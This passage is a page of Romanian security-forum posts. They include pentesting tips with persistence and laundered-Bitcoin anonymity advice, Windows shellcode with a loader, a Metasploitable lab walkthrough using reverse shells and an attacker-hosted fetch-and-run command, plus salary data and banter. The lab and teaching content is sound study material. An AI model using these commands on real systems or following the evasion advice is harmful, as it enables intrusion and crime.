vuln to be more effective than focusing on the vuln itself. This is where the Nexus and cheap smartphone come into play: taking the client’s domain with a laptop may scare up some results, but showing s customer that an attacker could cost them tens of millions with a $20 dollar smartphone or a $100 dollar tablet (from the parking lot) works wonders. C) I have an interest in learning to exploit everything and anything. This has served me well during network penetration tests, as many targets will defend their DCs, file servers and hosts, but not pay much attention to the printers and IoT devices within the network. D) To this end, learn to work with uncommon protocols. UPnP. NTLDNA and SSDP have been serving me well for the last couple years. Many file servers (and company smartphones/tablets when they are in scope) keep the UPnP door (and associated protocols) wide open. I once grabbed SNMP and other default network appliance creds from a fileserver through UPnP. 20) If you are going to pay for certs with your own cash, I recommend the OSCP. Yes, some of the machines/exploits are outdated. You won’t find many of the SMB remote exploits used for the course in the wild very often anymore (unless an Admin leaves a test server up, which happens occasionally). However, the overall experience, breakdown on enumeration methodology, self reliance and mindset the entire experience teaches you are invaluable. I have seen some sites peddling garbage certs with no industry recognition. Save your money for the OSCP; its profile in the industry is high and growing. Certs are no replacement for experience, but starting out with a IT/CS related degree or some general IT experience (even Helpdesk work) along with the OSCP will get you hired somewhere. 21) For persistence, I prefer adding innocuous user accounts/Remote Desktop accounts. If I am going to add some manner of privileged user account early to mid engagement, I usually try to add a more low profile account (if I have the option) such as Server Operator; these type of accounts allow privileged access you can build from, but generally are not watched with the scrutiny of an Administrator account. When I do create Administrator accounts (I try to wait until I begin my endgame), I will try to match the naming convention to similar accounts in within the network. if a For example, if the Administrator accounts within the network are named USsupervisor, I will name the added account something like USupervisor. If I know the clear text password of the account I have mimicked, I will use the same password. 22) Keep good notes during the engagement; too much information is better than to little information. Captured PCAPS of network traffic are great for examination during down time between engagements. 23) If you are a hacker, freedom fighter, or someone generally concerned about max privacy, this series of articles and configurations are for you: https://www.ivpn.net/blog/privacy-guides/advanced-privacy-and-anonymity-part-146 24) My favorite distro is Backbox; it starts out with a solid set of tools ninus the obscure bloat (and so far I have been able to add anything Kali has to Backbox). You can use Backbox's "Anonymous" option for a full transparent Tor proxy, Macchanger and host name changer and set RAM to overwrite on exit. I also keep Portable Virtualbox on a USB drive with a Kali Linux image... You could follow some of the advice here: http://www.torforum.org/viewtopic.php?f=2&t=1832020 And here: http://www.torforum.org/viewtopic.php?f=2&t=1832020 The articles above could help you create an encrypted USB with a Whonix gateway and Kali Linux workstation (you could probably exchange Kali OS in the Whonix Workstation for any Debian/Debian like OS). This configuration is disposable and concealable, and will run all of the Kali Workstation's (or other Debian/Debian like OS) through Tor. You could also create multiple other Vanilla Whonix Workstations/Gateways on the USB to create a type of local jumpbox sequencea to tunnel between/through SSH and/or VPN them before final Kali workstation. (Note: This is just a gut feeling, but for your own OpSec/security/anonymity, you are probably best replacing the Kali workstation with another Debian/Debian like distro. I have tried Katoolin in the Whonix Workstation, but I find that Katoolin often breaks i). 25) A VPS with your pentest tools installed is a valuable commodity; I call mine DeathStar, and I can call down some thunder from my Nexus 7 2013 flo (and a prepaid Wireless hotspot) from pretty much anywhere. There are some providers who do not give a damn about the traffic leaving your VM as long as you are using a VPN and a DMCA does not come their way. For hackers and freedom fighters, get your VPS from a country outside 14 Eyes countries (providers in Eastern European/former Soviet Block countries can be both dirt cheap and extremely honorable; just do your research and have tolerance for the occasional technical issue). You could pay with laundered/tumbled Bitcoin; even better are those providers who except gift cards (much like some VPN providers do)as payment. Have another party buy the gift cards a good distance away from you; you can find some of these providers who take gift cards on Low End Box. The VPS can be a valuable addition to the encrypted USB above (as you now have a host/node to catch your reverse shells without sacrificing Tor) when combined with SSH or IPsec (such as Strongswan, which is in the Debian repos). 26) Again, this post was long because I am busy, and Iwanted to make the contribution I felt I owed this site since shortly after it began. If you have technical questions concerning (or any questions in general), please post them as comments and I will definitely get you back an answer. https://0x00sec.org/t/shared-thoughts-after-6-years-in-pentesting/2492
  23. 8 points
    Cât câştigă un programator şi cum ne raportăm la salariile programatorilor din alte țări? Marti, 23 Mai 2017 7594 vizualizari Sursa foto Potrivit datelor despre salarii provenite din contribuțiile utilizatorilor Undelucram.ro, postate în ultimii 4 ani, am identificat un salariu minim net care pornește de la 1.000 RON (o pozitie entry level, aferentă unei experiențe reduse), şi care ajunge până la un maxim de 16.000 RON. Excluzând extremele, puține la număr, utilizatorii noștri, care au împărtășit comunității date despre venitul lor salarial, câştigă în medie 4.418 RON sau aprox. 1000 EUR. Sursa: Undelucram.ro Cum arată aceasta medie în raport cu datele colectate de institutul de statistică? Ultima valoare înregistrată, aferentă lunii martie 2017, arată o medie a caştigului unui angajat in “Activitati de servicii în tehnologia informatiei; Activitati de servicii informatice”, egală cu 5.880 RON (aprox. 1.292 EUR). Facem totuși precizarea că datele colectate de INS se referă la un domeniu de activitate mai larg, în consecință putem avea incluse în medie şi salarii care nu au legătură directă cu activitatea de programare. În 2016, salariile angajaților din IT au crescut cu 22% față de anul precedent, în timp ce în primele 3 luni ale lui 2017 se înregistrează o creștere de 9% an vs. an. Cum ne raportam la salariile țărilor din regiune, Europa de Vest, dar si America de Nord? Sursa: Undelucram.ro, INS, Eurostat, Institute de Statistica Nationale – Europa de Vest si America de Nord Așa cum am precizat, datele provenite de la unele instituții de statistică naționale nu oferă valori exclusive activității de programare. În schimb se realizeaza o medie, pe baza tuturor salariilor din domeniul IT. În graficul de mai sus, avem această situație pentru datele oferite de INS, dar si pentru cele oferite de instituțiile de statistica din unele țări ale Europei Centrale. Per ansamblu, valorile în regiune sunt destul de apropiate, mai mult chiar, România se află în fața Europei Centrale pe aceasta medie agregata din sectorul IT: 1.251 EUR vs. 1.154 EUR in regiune. Situația se schimbă radical în comparație cu țări considerate dezvoltate, iar aici valorile sunt direct comparabile cu datele de pe Undelucram, pentru că se refera strict la activitățile de programare. Un programator din Europa de Vest câstigă în medie 3.155 EUR, iar unul din America de Nord 4.547 EUR, de aproximativ 3, respectiv 4 ori mai mult decât salariul din România. Cum arată datele în contextul unei comparații cu Indicele Cheltuielilor de zi cu zi, aferent locațiilor geografice respective? Sursa: Numbeo.com În Europa Centrală, indicele cheltuielilor curente este doar cu aprox. 15% mai mare decat in România. În schimb, în țările din Europa de Vest, precum si peste ocean, costul vieții este mai mult sau mai puțin DUBLU. Cum arată salariul programatorilor, ajustat la puterea de cumpărare aferentă regiunilor comparate? Sursa: Calcule Undelucram.ro, Numbeo.com Chiar si ajustate la puterea de cumpărare, în comparație cu țara noastră, salariile programatorilor sunt cu 60% mai mari in Europa de Vest si mai mult decât duble in America de Nord. Pe lângă salarii, ce alte beneficii mai primesc angajații care lucrează în PROGRAMARE? Asigurare medicala şi Program flexibil, marea majoritate: 61%, respectiv 67% Tichete de masă: mai puțin de jumatate, 42% Al 13-lea salariu şi pensie facultativă: foarte puțini: 30%,respectiv 10%. Spune comunității cât câştigi. Postarea ta este şi va rămâne anonimă. Sursa: https://www.undelucram.ro/stire/cat-castiga-un-programator-si-cum-ne-raportam-la-alte-tari-1105
  24. 8 points
    Creaza o baza de date cu ce e pe pagina de Activity de pe IP Board 4. Mai multe instructiuni in README.md. E un API pentru a prelua ultimele 20 de actiuni de pe un forum IP Board 4, cum e RST. https://github.com/RomanianSecurityTeam/IPBActivityCrawler Scris pe fuga, probabil am sarit niste post types, se vor adauga pe parcurs. Pregatesc un nou index. Todo: Crawl pe notificari cu suport pentru user auth.
  25. 8 points
    Windows x86 SwapMouseButton shellcode /* Title: Windows x86 SwapMouseButton shellcode Author: Ionut Popescu Date: December 2015 Tested on: Windows 7/Windows 10 Build/Run: Visual C++ Express Edition Shellcode written for educational purposes. Detailed description: - http://securitycafe.ro/2015/10/30/introduction-to-windows-shellcode-development-part1/ - http://securitycafe.ro/2015/12/14/introduction-to-windows-shellcode-development-part-2/ - http://securitycafe.ro/2016/02/15/introduction-to-windows-shellcode-development-part-3/ */ /* ; Shellcode details ; ----------------- xor ecx, ecx mov eax, fs:[ecx + 0x30] ; EAX = PEB mov eax, [eax + 0xc] ; EAX = PEB->Ldr mov esi, [eax + 0x14] ; ESI = PEB->Ldr.InMemOrder lodsd ; EAX = Second module xchg eax, esi ; EAX = ESI, ESI = EAX lodsd ; EAX = Third(kernel32) mov ebx, [eax + 0x10] ; EBX = Base address mov edx, [ebx + 0x3c] ; EDX = DOS->e_lfanew add edx, ebx ; EDX = PE Header mov edx, [edx + 0x78] ; EDX = Offset export table add edx, ebx ; EDX = Export table mov esi, [edx + 0x20] ; ESI = Offset namestable add esi, ebx ; ESI = Names table xor ecx, ecx ; EXC = 0 Get_Function: inc ecx ; Increment the ordinal lodsd ; Get name offset add eax, ebx ; Get function name cmp dword ptr[eax], 0x50746547 ; GetP jnz Get_Function cmp dword ptr[eax + 0x4], 0x41636f72 ; rocA jnz Get_Function cmp dword ptr[eax + 0x8], 0x65726464 ; ddre jnz Get_Function mov esi, [edx + 0x24] ; ESI = Offset ordinals add esi, ebx ; ESI = Ordinals table mov cx, [esi + ecx * 2] ; Number of function dec ecx mov esi, [edx + 0x1c] ; Offset address table add esi, ebx ; ESI = Address table mov edx, [esi + ecx * 4] ; EDX = Pointer(offset) add edx, ebx ; EDX = GetProcAddress xor ecx, ecx ; ECX = 0 push ebx ; Kernel32 base address push edx ; GetProcAddress push ecx ; 0 push 0x41797261 ; aryA push 0x7262694c ; Libr push 0x64616f4c ; Load push esp ; "LoadLibrary" push ebx ; Kernel32 base address call edx ; GetProcAddress(LL) add esp, 0xc ; pop "LoadLibrary" pop ecx ; ECX = 0 push eax ; EAX = LoadLibrary push ecx mov cx, 0x6c6c ; ll push ecx push 0x642e3233 ; 32.d push 0x72657375 ; user push esp ; "user32.dll" call eax ; LoadLibrary("user32.dll") add esp, 0x10 ; Clean stack mov edx, [esp + 0x4] ; EDX = GetProcAddress xor ecx, ecx ; ECX = 0 push ecx mov ecx, 0x616E6F74 ; tona push ecx sub dword ptr[esp + 0x3], 0x61 ; Remove "a" push 0x74754265 ; eBut push 0x73756F4D ; Mous push 0x70617753 ; Swap push esp ; "SwapMouseButton" push eax ; user32.dll address call edx ; GetProc(SwapMouseButton) add esp, 0x14 ; Cleanup stack xor ecx, ecx ; ECX = 0 inc ecx ; true push ecx ; 1 call eax ; Swap! add esp, 0x4 ; Clean stack pop edx ; GetProcAddress pop ebx ; kernel32.dll base address mov ecx, 0x61737365 ; essa push ecx sub dword ptr [esp + 0x3], 0x61 ; Remove "a" push 0x636f7250 ; Proc push 0x74697845 ; Exit push esp push ebx ; kernel32.dll base address call edx ; GetProc(Exec) xor ecx, ecx ; ECX = 0 push ecx ; Return code = 0 call eax ; ExitProcess */ #include "stdafx.h" #include <Windows.h> int main() { char *shellcode = "\x33\xC9\x64\x8B\x41\x30\x8B\x40\x0C\x8B\x70\x14\xAD\x96\xAD\x8B\x58\x10\x8B\x53\x3C\x03\xD3\x8B\x52\x78\x03\xD3\x8B\x72\x20\x03" "\xF3\x33\xC9\x41\xAD\x03\xC3\x81\x38\x47\x65\x74\x50\x75\xF4\x81\x78\x04\x72\x6F\x63\x41\x75\xEB\x81\x78\x08\x64\x64\x72\x65\x75" "\xE2\x8B\x72\x24\x03\xF3\x66\x8B\x0C\x4E\x49\x8B\x72\x1C\x03\xF3\x8B\x14\x8E\x03\xD3\x33\xC9\x53\x52\x51\x68\x61\x72\x79\x41\x68" "\x4C\x69\x62\x72\x68\x4C\x6F\x61\x64\x54\x53\xFF\xD2\x83\xC4\x0C\x59\x50\x51\x66\xB9\x6C\x6C\x51\x68\x33\x32\x2E\x64\x68\x75\x73" "\x65\x72\x54\xFF\xD0\x83\xC4\x10\x8B\x54\x24\x04\x33\xC9\x51\xB9\x74\x6F\x6E\x61\x51\x83\x6C\x24\x03\x61\x68\x65\x42\x75\x74\x68" "\x4D\x6F\x75\x73\x68\x53\x77\x61\x70\x54\x50\xFF\xD2\x83\xC4\x14\x33\xC9" "\x41" // inc ecx - Remove this to restore the functionality "\x51\xFF\xD0\x83\xC4\x04\x5A\x5B\xB9\x65\x73\x73\x61" "\x51\x83\x6C\x24\x03\x61\x68\x50\x72\x6F\x63\x68\x45\x78\x69\x74\x54\x53\xFF\xD2\x33\xC9\x51\xFF\xD0"; // Set memory as executable DWORD old = 0; BOOL ret = VirtualProtect(shellcode, strlen(shellcode), PAGE_EXECUTE_READWRITE, &old); // Call the shellcode __asm { jmp shellcode; } return 0; }
  26. 7 points
    Salut, Am vrut sa lucrez ceva in .NET si fiind inspirat de encoderul de pe Crypo.com si de toolul lui Gecko am decis sa scriu aceasta aplicatie. E simplu de folosit si isi face treaba... Suporta urmatorii algoritmi: Reverse Hexadecimal Binary ASCII Base64 Caesar MD5 SHA RC4 AES ROT13 ATOM128 Aici aveti un screenshot cu aplicatia: http://i.imgur.com/XgxdTTL.png Download de pe site-ul meu: http://adrenalinetech.xyz/downloads/CipherGuru/ Sursa pe github: https://github.com/adrenalinetech/CipherGuru Daca aveti nemultumiri sau vreti sa adaug un algoritm va rog sa imi spuneti. Multumesc.
  27. 7 points
    Acel "as->i <- scrie" s-a reflectat in scaderea pretului.
  28. 7 points
    Bre, aia 15k euro as zice sa-i investesti in hetnix.com - sa-i faci faci canalizare la AGSQ de sa moara toata babornita din Bailesti de ciuda si catranire. Faci promovare si vinzi dedicate de il bati pe tex la vanzari de il asculti cu urechea. Dupa ce i-ai umflat mucii, iei o parte din profit si platesti pe un fraier sa iti tina contabilitatea in timp ce tu cu o mana scoti maseaua lui Mos Ghitza din Deal si cu cealalta dai un short la FTSE250 sa faca boala toti evreii. Profitul pe primul an il reinvestesti in Gabonne sa iti dea energie pozitiva level 10 si sa-ti indeplineasca toate dorintele. You're welcome!
  29. 7 points
    Totul este relativ. Cand faceti calcule de genul acesta, incercati sa luati in considerare multe alte chestii, incadrate la "calitatea vietii". Astfel, variabile ar fi calitatea aerului respirat, a produselor din market, a serviciilor medicale, a interactiunii cu institutiile statului, calitatea transportului in comun, serviciilor, amabilitatii chelnerilor, prestatia curvelor, si alte variabile.Deasemenea, nu va ganditi ca programator este doar ala de face pagini web, sau scrappere cu pitonul, ci programator este si ala de lucreaza cu masini cu comanda numerica, printere 3d, aplicatii SCADA, etc. Cati dintre voi au habar de programarea robotilor industriali sau au auzit de TOSMAP?Plm, poti trai bine si sa fi fericit si cu 500 euro si cu 5000 euro, sau poti fi nefericit cu un venit de 15k euro lunar. Astea sunt discutii care pot fi incadrate la filozofie.
  30. 7 points
    Ce vrei tu sa faci e sincronizare spirituala. PC-ul tau se conecteaza la VPS-ul respectiv si intr-un anume moment din rugaciune, cele 2 entitati devin una singura si atunci telul tau este realizat.
  31. 7 points
    Ce mult iubesc eu pe astia ca tine care dau repede cu "daca vreti sa se schimbe ceva cu adevarat in tara asta". Bai pulete sinistru, daca vrei sa schimbi ceva, nu mai cere bani pe cultura. Daca nu am bani sa-mi cumpar carti, ma lasi sa mor prost? Stii cum e sa faci foamea sa-ti cumperi o carte? Manca-mi-ati pula de labari.
  32. 6 points
    hmm, după voce pare a fi @MrGrj cu dildo full inserted.
  33. 6 points
    CloudFail is a tactical reconnaissance tool which aims to gather enough information about a target protected by CloudFlare in the hopes of discovering the location of the server. Using Tor to mask all requests, the tool as of right now has 3 different attack phases. Misconfigured DNS scan using DNSDumpster.com. Scan the Crimeflare.com database. Bruteforce scan over 2500 subdomains. Please feel free to contribute to this project. If you have an idea or improvement issue a pull request! Disclaimer This tool is a PoC (Proof of Concept) and does not guarantee results. It is possible to setup CloudFlare properly so that the IP is never released or logged anywhere; this is not often the case and hence why this tool exists. This tool is only for academic purposes and testing under controlled environments. Do not use without obtaining proper authorization from the network owner of the network under testing. The author bears no responsibility for any misuse of the tool. Usage To run a scan against a target: python cloudfail.py --target seo.com To run a scan against a target using Tor: service tor start (or if you are using Windows or Mac install vidalia or just run the Tor browser) python cloudfail.py --target seo.com --tor Dependencies Python3 argparse colorama socket binascii datetime requests Download:https://github.com/m0rtem/CloudFail
  34. 6 points
    Pai ce faci ma nene ma? De aici
  35. 6 points
    :))))))))))))))))))) Bre, mai deschizi multe topicuri de rahat. Fara suparare dar bati rau la ochi omule. Intr-un topic spui ca vrei sa faci facultate sa-ti poti tine singur contabilitatea, in altul ca vrei sa-ti faci cabinet stomatologic, in altul ca vrei offshore sa eviti taxele la stat
  36. 6 points
    Step by step Metasploit walkthrough Usually, the ultimate goal is to get a root shell on the target machine, meaning you have total control over that machine. I will demonstrate step by step how to obtain a root shell on the Metasploitable 3 virtual machine using Metasploit. You will see that hacking is not always straightforward and more than often, you need to start again or find alternative solutions. To start, I booted the freshly created Metasploitable 3 VM and logged in as the vagrant user. Let's go. Step 1: Reconaissance Before actually hacking your way in, you need to find more information about your target. You have to find out the ip adress, running services and possible vulnerable services to choose your attack vector. Let's start with a simple netdiscover scan to find the IP adress of our target. To do so, just type netdiscover in your terminal. I know 192.168.0.149 is my own adress, so the ip adress of my host should be 192.168.0.206. Note: as I wrote this blogpost over a longer period, the used ip addresses later in this blogpost of the target machine can vary from 192.168.0.205 to 192.168.0.206 Let's continue with an Nmap scan to find running services: nmap -sV 192.168.0.206 Copy We find an Apache webserver running on port 8022. Let's look into that. Open firefox and enter the IP adress + the port: 192.168.0.205:8022. We see that Desktop Central 9 software is running on port 8022. A quick google search learns us there is an exploit available! Bingo! Step 2: exploit a service to get a shell Now we have identified a vulnerable service and an available exploit, it's start to exploit the machine: Start Metasploit by running msfconsole in the terminal or click the shortcut. You can find the path for the exploit we found above by entering: search ManageEngine Copy After executing the search command, we find the Manage Engine Desktop Central 9 exploit we've found via google. To start using the exploit, type the path as highlighted in the previous screen. You can use tab for autocomplete. use exploit/windows/http//manageengine_connectionid_write Copy Now the exploit is loaded. Personally, I always run show options to see which settings are available and which are required. We see 3 required settings here: RHOST: the target address. This will be the IP address of our target host - 192.168.0.206 RPORT: the target port. During our Nmap portscan, we found the service running on 8022. TARGETURI : the path for the Desktop Central software. Leave this is the standard setting. To set your own settings, you need to execute set SETTING value, e.g.: set RHOST 192.168.0.206 Copy set RPORT 8022 Copy Understanding the difference between the concepts vulnerability, payload and exploit is important. The payload is the actual code you wish to execute, whilst the exploit is a way to deliver the payload. A vulnerability is a weak spot in the system that allows the exploit to work. If you take the analogy of a rocket, the rocket is the exploit whilst the warhead is the payload, delivering the actual damage. Now we have setup the exploit, we need to attach a payload to it. Usually, our payload is spawning a reverse shell to us, allowing us to interact with the target system. This means we are going to execute specific code on the target machine that will setup a shell (command line) back to us. There are different shells that can be spawned when attacking a Windows machine, such as a windows command line or a Windows powershell. A very interesting payload is meterpreteter one because it is capable of so much more of simpy spawning a shell. Meterpreter is an advanced multi-function payload that is superior to other payloads because in contrast to other payloads that execute one command (such as adding a user or spawning a shell), meterpreter can be seen as an interactive shell allowing you to download/upload files, dump password hashes, spawn shells, installing backdoor, privilege escalation and so on. Another significant advantage is that meterpeter fully resides in the memory by using DLL injection in existing processes without touching the disk. Furthermore, it can migrate from one process to another to make detection very difficult. To carry out its tasks, it does not create other processes which would be easily picked up by Antiviruses or Itrusion Detection Systems. To attach a meterpreter payload to our exploit, use the following command: set payload windows/meterpreter/reverse_tcp Copy If you run show options again now, you will see that Payloads options are visible now: LHOST: the host where the meterpreter will connect back to. This will be the address of our own Kali VM 192.168.0.241 LHOST: the port where the meterpreter will connect back to. Choose any available port you like or leave it on 4444. Set our listen adress to our own address: set LHOST 192.168.0.241 Copy We're set to fire the exploit. Simply type: exploit Copy As shown on the screenshot below, you see the exploit worked and the payload was activated and provided us with a meterpreter shell. To check our current privilege, type getuid. Unfortunately, we only have a lower privilege shell. Because we only have a lower privilege shell with limited access, to fully compromise the machine we will need to escalate our privileges. There are number of options available, but always try the easy way first. Execute getsystem to try Meterpreter to execute a few tricks in its sleeve to attempt automated privilege escalation. Unfortunately, it didn't work this time. To spawn a local shell (in this case Windows Command Line), just type shell. A very powerful Windows privilege escalation framework is Powersploit, written in Powershell. We downloaded and extracted the zip file on our Desktop in a folder Powersploit. We will start a web server with PowerShell, so we can easily call them via our meterpreter shell. Navigate to the unzipped folder and start a web server via the following command: We're set to fire the exploit. Simply type: python -m SimpleHTTPServer Copy Let's return to our Meterpreter session. It is possible to spawn a Powershell shell within Meterpreter but it's far easier to load scripts such as Powersploit if you immediately spawn a reverse PowerShell with the payload. To do so, we will exit the meterpreter session and add a PowerShell payload instead of a meterpreter payload to our exploit by entering the command below. Quickly check show options to verify if the listen address is still correct. set payload windows/powershell_reverse_tcp Copy And we have a PowerShell session! You can ignore the Invoke-Expression errors. This is where it gets a bit more advanced. We can not just download Powersploit to our target system, as this will more than likely raise red flags by Antivirus systems. To avoid this, we will directly download the script from the web server we just created and execute a PowerSploit script in the memory without touching the disk. We are going to use PowerUp.ps1, which is a specially crafted PowerShell script that is part of the PowerSploit framework. To download the script in the memory, execute the following command in PowerShell: IEX(New-Object Net.WebClient).DownloadString("http://192.168.0.241:8000/Privesc/PowerUp.ps1") Copy Next, we execute a function from the scripts called Invoke-AllChecks, which will check the target host for attack vectors for privilege escalation. To make it easier to read, we will output the result to a file named allchecks.txt Invoke-AllChecks | Out-File allchecks.txt Copy To check-out the results, open a new terminal and launch a new instance of Metasploit and get the meterpreter shell up again (we should have saved our previous session instead of terminating it). To do so, repeat the steps as you did last time but choose another listening port as we are already using 4444 in our PowerShell session (see left terminal window on the screenshot below). Now we have two shells running on the same target host, a PowerShell and a meterpreter shell. To download the all-checks.txt file, execute download allchecks.txt with meterpreter. Download a copy of the allchecks.txt here. As you can read in the allchecks.txt file, the script checks the target system for privilege escalation vulnerabilities such as unquoted servicepaths, hackable DLL locations, unattended install files, etc.. Let's focus on these unquoted servicepaths and service executable and argument permissions. Basically, these are improperly configured service paths where custom commands can be added to. As services are run by the system user, this would mean that our custom command also is executed as system user. Nice! The catch however is that you also need improperly configured write access rights to these services to add your custom command. PowerSploit makes it easy for you and gives you the abuse functions you need to execute to exploit a possible vulnerability. By example, for abusing the service Jenkins, we would need to execute the following command: Install-ServiceBinary -Name 'jenkins'. Unfortunately, after executing all given commands, we were not able to abuse a function due to no write access rights. Maybe PowerSploit didn't catch all unquoted servicepaths. Let's check manually in our open meterpreter shell. First get a Windows Command Line by executing shell. Execute the following command: wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ Copy Using this method, we find 4 possible vulnerable services. One of these services, OpenSSHd was not in the list of PowerSploit. Let's try to exploit this service. Attempt exploitation of the service OpenSSHd by executing the following command in PowerShell. We see that the PowerShell session closed immediately. With some luck, the command was installed anyway. According to the Readme of PowerSploit, when using the command below the user John with password Password123! should be added to the administrators group. Install-ServiceBinary -Name 'OpenSSHd' Copy Let's try to restart the service with net stop OpenSSHd and net start OpenSSHd and see if our command kicks in. Unfortunately, we have no access to start or stop a service. I also quickly verified if the user John was added, but no luck. There is another way to restart a service, and that's forcing a reboot of our target host. Let's run Nmap to see if the host is vulnerable to some attacks to force a reboot. We found a vulnerability to the MS12-020 bug, exploited by CVE-2012-0002. Type back in the Metasploit console where our PowerShell just closed down and follow the same procedure as last time: search for the exploit, configure the exploit and and execute it. This exploits sends a sequence of specially crafted RDP packets to an affected system causing it to crash and reboot. (make sure to watch your Metasploitable 3 VM when launching this exploit) Your active Windows Command Line shell will have died because of the reboot. When the machine is back online, simply type exploit again to reconnect to the meterpreter shell. Spawn a Windows Command Line by executing shell and check with net users if our exploit worked. It worked! We have created a new user named John, which is part of the Administrators group. We know from the PowerSploit Readme that his password is Password123!. Next step is to actually login with our new Administrator and get a root shell. Let's try the famous PSExec exploit with our new Administrator details. Another cool trick is spawning a remote Desktop. Could be very usefull for enumeration of the box or disabling firewall (rules) if the PSExec should not work. Sursa: https://www.zero-day.io/metasploitwalkthrough/
  37. 6 points
    Vezi ca zborul cu avioanele si mersul cu masina este pilotat de calculator. Alea la randul lor sunt facute de programatori. La o simpla troaca de masina cu ecu ai calcule complexe, actuatori, abs, esp, franare, debit de aer calculat, injectie si sute de parametrii ce functioneaza si iti salveaza curul. Toate sunt facute de programatori. Cand spui programare te referi cumva la javascript, php si python pentru elevi ? :)))) Studiile alea despre salarii sunt trase de par oricum. In NL ajungi si la 8000 /lunar. In CH ajungi la 12000 chiar. In DE sari cu mult de 3000. Depinde de ce experienta ai si unde lucrezi.
  38. 6 points
    Black Hat Arsenal USA 2017 On June 1, 2017 @toolswatch announced the tools selected for Black Hat Arsenal USA 2017. Most of the selected tools are already present on GitHub and some are yet to be uploaded. This article contains the links to their respective repositories. The tools are arranged according to their tracks. If you like the tool, go to its repository and click Watch to keep updated on the latest commits and pushes. Some tools will be updated during/after the Arsenal event. Links to the GitHub repositories of those tools will be eventually updated in this article. Android, iOS and Mobile Hacking Android Tamer https://github.com/AndroidTamer DiffDroid https://github.com/antojoseph/diff-droid Kwetza https://github.com/sensepost/kwetza Needle https://github.com/mwrlabs/needle NoPE Proxy (Non-HTTP Proxy Extension) https://github.com/summitt/Burp-Non-HTTP-Extension Code Assessment Puma Scan https://github.com/pumasecurity/puma-scan Tintorera: Source Code Intelligence (Code not yet uploaded) https://github.com/vulnex/Tintorera Cryptography Hashview https://github.com/hashview/hashview Gibber Sense https://github.com/smxlabs/gibbersense Data Forensics and Incident Response PcapDB: Optimized Full Network Packet Capture for Fast and Efficient Retrieval https://github.com/dirtbags/pcapdb SCOT (Sandia Cyber Omni Tracker) Threat Intelligence and Incident Response Management System https://github.com/sandialabs/scot Security Monkey https://github.com/Netflix/security_monkey ThreatResponse: An Open Source Toolkit for Automating Incident Response in AWS https://github.com/ThreatResponse Yalda — Automated Bulk Intelligence Collection (Code not yet uploaded) https://github.com/gitaziabari/Yalda Exploitation and Ethical Hacking AVET — AntiVirus Evasion Tool https://github.com/govolution/avet GDB Enhanced Features (GEF) https://github.com/hugsy/gef Leviathan Framework https://github.com/leviathan-framework/leviathan MailSniper https://github.com/dafthack/MailSniper Seth https://github.com/SySS-Research/Seth Hardware/Embedded ChipWhisperer https://github.com/newaetech/chipwhisperer DYODE, a DIY, Low-Cost Data Diode for ICS https://github.com/arnaudsoullie/dyode FTW: Framework for Testing WAFs https://github.com/fastly/ftw The Bicho: An Advanced Car Backdoor Maker https://github.com/UnaPibaGeek/CBM Internet of Things Hacker Mode https://github.com/xssninja/Alexa-Hacker-Mode Universal Radio Hacker: Investigate Wireless Protocols Like a Boss https://github.com/jopohl/urh Malware Defense Aktaion v2 — Open Source Machine Learning and Active Defense Tool https://github.com/jzadeh/Aktaion Cuckoo Sandbox https://github.com/cuckoosandbox/cuckoo LimaCharlie https://github.com/refractionPOINT/limacharlie Malboxes https://github.com/GoSecure/malboxes Network Attacks BloodHound 1.3 https://github.com/BloodHoundAD/BloodHound CrackMapExec v4 https://github.com/byt3bl33d3r/CrackMapExec DELTA: SDN Security Evaluation Framework https://github.com/OpenNetworkingFoundation/DELTA eaphammer https://github.com/s0lst1c3/eaphammer gr-lora: An Open-Source SDR Implementation of the LoRa PHY https://github.com/BastilleResearch/gr-lora Yasuo https://github.com/0xsauby/yasuo Network Defense Assimilator https://github.com/videlanicolas/assimilator Noddos https://github.com/noddos/noddos Sweet Security https://github.com/TravisFSmith/SweetSecurity OSINT — Open Source Intelligence Datasploit — Automated Open Source Intelligence (OSINT) Tool https://github.com/DataSploit/datasploit Dradis: 10 Years Helping Security Teams Spend More Time Testing and Less Time Reporting https://github.com/dradis/dradis-ce OSRFramework: Open Sources Research Framework https://github.com/i3visio/osrframework Reverse Engineering BinGrep https://github.com/m4b/bingrep Vulnerability Assessment Aardvark and Repokid https://github.com/square/Aardvark SERPICO https://github.com/SerpicoProject/Serpico SimpleRisk https://github.com/simplerisk/code Web AppSec BurpSmartBuster: A Smart Way to Find Hidden Treasures https://github.com/pathetiq/BurpSmartBuster CSP Auditor https://github.com/GoSecure/csp-auditor Easily Exploit Timing Attacks in Web Applications with the ‘timing_attack’ Gem https://github.com/ffleming/timing_attack Fuzzapi — Fuzzing Your RESTAPIs Since Yesterday https://github.com/lalithr95/fuzzapi Offensive Web Testing Framework (OWASP OWTF) https://github.com/owtf/owtf PyMultiTor https://github.com/realgam3/pymultitor ThreadFix Web Application Attack Surface Calculation https://github.com/denimgroup/threadfix WaToBo — The Web Application Toolbox https://github.com/siberas/watobo WSSiP: A WebSocket Manipulation Proxy https://github.com/nccgroup/wssip If you haven’t looked at the selected tools, check the below embed to view the complete details of the tools and its presenters. The Black Hat Arsenal USA 2017 Phenomenal Line-Up Announced Just a BIG w00w !! Over 90 tools covering hardware/embedded, IoT, Malware defense, exploitations and more ! We had…www.toolswatch.org Sursa: https://medium.com/hack-with-github/black-hat-arsenal-usa-2017-3fb5bd9b5cf2
  39. 6 points
    Bre, eu castigam destul de frumos si sambata mergeam sa descarc CAMION de saci de ciment la depozit de materiale de constructie. Aia face muschiul gros. Faci sport, iei si bani si te mentii bine. Ce saracia sa faci, sa stai sa bei cu vecinii la bloc ? :))))
  40. 6 points
  41. 6 points
